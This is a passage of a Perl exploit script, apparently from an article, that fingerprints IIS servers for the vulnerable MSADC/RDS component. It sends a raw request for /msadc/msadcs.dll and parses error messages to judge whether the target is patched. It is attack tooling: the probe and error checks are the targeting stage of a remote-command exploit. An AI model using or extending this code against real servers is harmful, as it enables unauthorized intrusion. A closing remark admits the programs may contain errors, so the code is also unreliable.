if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}}

##############################################################################

sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return 1 if($results[$base]=~/Content-Type: application\/x-varg/);
return 0;}

########################


(The programs in this article were put together in a hurry and may contain small errors; please proofread them yourself.)